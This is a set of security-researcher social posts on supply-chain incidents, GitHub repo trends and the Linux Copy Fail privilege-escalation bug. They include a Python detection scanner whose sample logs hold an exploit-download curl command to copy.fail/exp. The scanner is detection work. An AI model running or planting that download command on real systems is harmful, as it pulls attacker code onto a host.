🫂"hugs from TeamPCP."
We're now 47 days and three rounds deep into the Checkmarx incident -- and this time TeamPCP left a message for victims in `~/hugs_from_teamPCP.txt`
Things appear mitigated, but waiting to see if rotation was a bit more atomic this time 🤞
List of most popular/active public repos on GitHub - April edition:
- @openclaw hype is over?
- @Microsoft GenAI tutorials are back to the first place
- April normalized to AI models and established learning resources
Preliminary exploit detections for Copy Fail (CVE-2026-31431) based on our tests (these work best in combination):
1. "NET: Registered PF_ALG protocol family" in kern.log & syslog
2. curl for "copy[.]fail/exp" (if attacker is lazy)
3. su record without invoking user in auth.log
Patch your Linux boxes!
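Added example (not from the original post): a small Python scanner that applies the three indicators above to constructed log lines and flags a host only when several of them line up, since each one alone is weak. The `su: (to root) alice on pts/0` layout is the Debian-style auth.log format and an assumption; note that the PF_ALG registration line is also printed whenever the af_alg module is loaded for legitimate reasons, so it is noise on its own.

```python
import re

# Constructed sample logs (not real captures), one line per indicator.
SAMPLE_LOGS = {
    "kern.log": [
        "Apr 12 10:01:02 host kernel: [  123.45] NET: Registered PF_ALG protocol family",
        "Apr 12 10:01:03 host kernel: [  123.46] eth0: link up",
    ],
    "syslog": [
        "Apr 12 10:01:05 host bash[2211]: curl -s https://copy.fail/exp -o /tmp/x",
    ],
    "auth.log": [
        "Apr 12 09:58:00 host su: (to root) alice on pts/0",   # normal: invoker present
        "Apr 12 10:01:07 host su: (to root)  on pts/1",        # invoking user missing
    ],
}

# Indicator 1: af_alg socket family registered (benign on module load, suspicious mid-uptime).
PF_ALG_RE = re.compile(r"NET: Registered PF_ALG protocol family")
# Indicator 2: the download URL quoted in the post, defanged there as copy[.]fail/exp.
COPYFAIL_URL_RE = re.compile(r"\bcurl\b.*\bcopy\.fail/exp\b", re.IGNORECASE)
# Indicator 3: Debian-style su record; layout is an assumption, adjust per distro.
SU_RE = re.compile(r"\bsu(?:\[\d+\])?: \(to (?P<target>\S+)\)\s*(?P<invoker>\S*)\s+on\s+(?P<tty>\S+)")


def scan_logs(logs):
    """Return (indicator, source_file, line) for every matching line."""
    hits = []
    for src, lines in logs.items():
        for line in lines:
            if src in ("kern.log", "syslog") and PF_ALG_RE.search(line):
                hits.append(("pf_alg_registered", src, line))
            if COPYFAIL_URL_RE.search(line):
                hits.append(("copyfail_download", src, line))
            if src == "auth.log":
                m = SU_RE.search(line)
                if m and m.group("invoker") == "":
                    hits.append(("su_without_invoker", src, line))
    return hits


def assess(hits):
    """Combine signals: two or more distinct indicators -> 'likely', one -> 'possible'."""
    kinds = {kind for kind, _, _ in hits}
    if len(kinds) >= 2:
        return "likely"
    return "possible" if kinds else "none"


if __name__ == "__main__":
    found = scan_logs(SAMPLE_LOGS)
    for kind, src, line in found:
        print(f"[{kind}] {src}: {line}")
    print("verdict:", assess(found))
```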
https://t.co/VWOUDbLAn2 is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms.
Found by the teams at @theori_io and @xint_official
More details below
https://t.co/9f6T96PvPX
Fork commits keep showing up in supply chain attacks (tj-actions, reviewdog, TeamPCP).
But I keep seeing incorrect explanations in incident threads/blogs
So I built a microsite to cut through the confusion
🔗in🧵
Monthly list of most popular/active public repos on GitHub:
- @openclaw keeps the first place (although at half the pace compared to February)
- Rise of the personal claude skills and harnesses over official anthropics/skills
- karpathy/autoresearch - fast-breaker
Turns out # of forks is a great metric of repo popularity. Here are the most popular/forked repos of Feb 2026. Of course, #OpenClaw is leading the pack:
@GrahamHelton3 This is great research @GrahamHelton3. Couldn't find it in the blog - is the command execution possible with node/proxy:list or node/proxy:watch?
UPDATE: Shai-Hulud 2.0 has a long tail, and it may have led to $7M in crypto theft.
Earlier today, our update laid out how sha1-hulud may have caused the Trust Wallet incident.
Trust Wallet just announced the same conclusion. Read our analysis >> https://t.co/nYIaOcueNB
With #shaihulud2 refusing to die, with its long tail of infections (117 new compromised machines in the last 72 hours, most of them from @Cursor IDE), all @github has to do is disable the gho_ tokens of the super-spreaders (last 2 active spreaders are Cpreet and moh-abed).
🪱sharing more on sha1-hulud w/@sshaybbc
* 2 packages == ~60% of infections
* 400k unique secrets in truffleSecrets.jsons, only 2.5% verified, & the majority of those short lived JWTs for GitHub Actions!
* 3/4 of impacted workloads were CI/CD, 1/4 were users
🔗below
🤖 65% of Forbes AI 50 companies leaked secrets on GitHub. @sshaybbc revealed how AI speed without security = leaks waiting to happen.
Full Wiz Research report 👉
https://t.co/kmamDrkIo3
@adnanthekhan At the end we need an attribution to stop this crazy attack sequence, I'd love to see more publications around the actor behaviour and to see GH doing more.
@adnanthekhan No cloud impact so far, but the abuse of the cloud access is an incremental evolution step that this actor seems to demonstrate with every attack. Given the likely pool of cloud creds they have now I won't be surprised...